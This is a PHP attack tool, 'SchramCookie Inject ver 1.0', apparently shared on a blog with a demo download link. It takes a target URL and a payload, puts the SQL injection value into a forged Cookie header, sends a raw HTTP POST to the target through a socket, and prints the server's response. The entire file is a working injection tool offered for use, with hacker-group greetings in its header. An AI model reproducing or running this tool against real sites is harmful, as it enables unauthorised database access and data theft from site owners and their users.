<?php
/*######################################################################### * /
*
* - >> SchramCookie Inject ver 1.0
* C0de by Nig3h -Greetz To All H3xIe Member.
* link : xiaosan.cnblogs.com
* ex : http://host/?url={$argv[0]}?id = variable;
*
*######################################################################### */
ini_set("max_execution_time", 0);
$Current_Host = null;
$Inj_Page = null;
$Query_String = null;
$Self = null;
$Query_Value = null;
if (empty($_GET["url"])) die("<h5>Please Enter Query_String.</h5>");
Auto_($_GET["url"], $_GET["id"]);
function Printf_Info()
{
GlOBAL $Current_Host, $Inj_Page, $Query_String, $Self, $Query_Value;
$Magic_Quotes_GPC_Bool = False;
if (get_magic_quotes_gpc()) $Magic_Quotes_GPC_Bool = True;
$GPC_Status = $Magic_Quotes_GPC_Bool == True?"On":"Off";
echo '<html>'."\n";
echo '<head><style type="text/css">'."\n";
echo 'body{background-color: #CCE8CF; Font-size:12px;}.Style{font-size:11px;}'."\n";
echo '</style></head>'."\n";
echo '<body>'."\n";
echo '<!-- Auth0r : Nig3h -->'."\n";
echo '<br />'."\n";
echo '<div align="center" class="Style">';
echo '$_SERVER[<Font Color="red">PHP_SELF</Font>] : '.$Self.'<br />'."\n";
echo 'HOST : '.$Current_Host.'<br />'."\n";
echo 'Magic_Quotes_GPC : '.'<strong>'.$GPC_Status.'</strong><br />'."\n";
echo 'Query_String : '.$Query_String.'<br />'."\n";
echo 'GET[ID]_Value : <strong><Font Color="Red">'.$Query_Value.'</Font></strong><br />'."\n";
echo 'Inject Page : '.$Inj_Page.'<br />'."\n";
echo 'Time : '.Date("M-D-Y").'<br />'."\n";
echo '<hr>';
echo '</div>';
echo '</body>'."\n";
echo '</html>'."\n";
}
function Auto_($url, $id)
{
$url_len = strlen($url);
$str_http = str_replace(chr(92), '//', strtolower(substr($url, 0, 7)));
if ($str_http == 'http://')
{
$host = substr($url, 7, $url_len);
}
for ($i = 0; $i <= strlen($host); $i++)
{
if (($host[$i] == '/') or ($host[$i] == chr(92)))
{
$_Current_Host = substr($host, 0, $i);
break;
}
}
$Scr_Name = substr($host, $i, $url_len);
$url_i = strlen($Scr_Name) + 1;
$Scr_Begin = $i;
for ($i = 0; $i < strlen($Scr_Name); $i++)
{
$url_i = $url_i - 1;
if ($Scr_Name[$url_i] == '?')
{
$_Inj_Page = substr($Scr_Name, 0, $url_i); # sql_inject Page;
break;
}
}
GLOBAL $Query_String, $Current_Host, $Inj_Page, $Query_Value, $Self;
$Query_String = substr($Scr_Name, $url_i+1, strpos($Scr_Name, '=') - $url_i -1); # Query_String;
$Current_Host = $_Current_Host;
$Inj_Page = $_Inj_Page;
$Query_Value = $id;
$Self = $_SERVER['PHP_SELF'];
Printf_Info();
Ini_Main($Current_Host, $Inj_Page, $Query_String, $id);
}
function Ini_Main($Current_Host, $Inj_Page, $Query_String, $id)
{
# Config
$Page_ID = $Query_String;
$Host = $Current_Host;
$Inj_Page = $Inj_Page;
# END_CONFIG
$inj_id = $id;
$inj_id = str_replace("=", "%3D", $id);
$inj_id = str_replace(" ", "%20", $inj_id);
$Cookie_Str = "XUJUSPNGRWXKIXLMZRTR=NGQIVFESDSNWCEBNMJSJDEIAMQVQWZMKOLMOZRCG;"."$Page_ID=$inj_id";
//$Data_Str = "id= $id";
$_HTTP_SEND_rs = POST($Host, 80, $Inj_Page, $Data_Str, 1000, $Cookie_Str);
echo $_HTTP_SEND_rs;
}
function Kill_Waste($str)
{
$str = strtolower($str);
$str = str_replace('<script', '<!-- ', $str);
$str = str_replace('</script', ' -->', $str);
$str = str_replace('<style', '<!-- ', $str);
$str = str_replace('</style', ' -->', $str);
$str = str_replace('<head', '<!-- ', $str);
$str = str_replace('</head', ' -->', $str);
return $str;
}
function POST($host,$port,$path,$data,$timeout, $cookie='')
{
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout);
if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
else {
fputs($fp, "POST $path HTTP/1.0\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-length: ".strlen($data)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data."\r\n\r\n");
$headers = "";
while ($str = trim(fgets($fp,4096)))
$headers .= "$str\n";
while(!feof($fp))
{
$buffer .= Kill_Waste(fgets($fp,4096));
}
fclose($fp);
}
return $buffer;
}
?>
Download demo:
http://files.cnblogs.com/xiaosan/SchramInj_demo.zip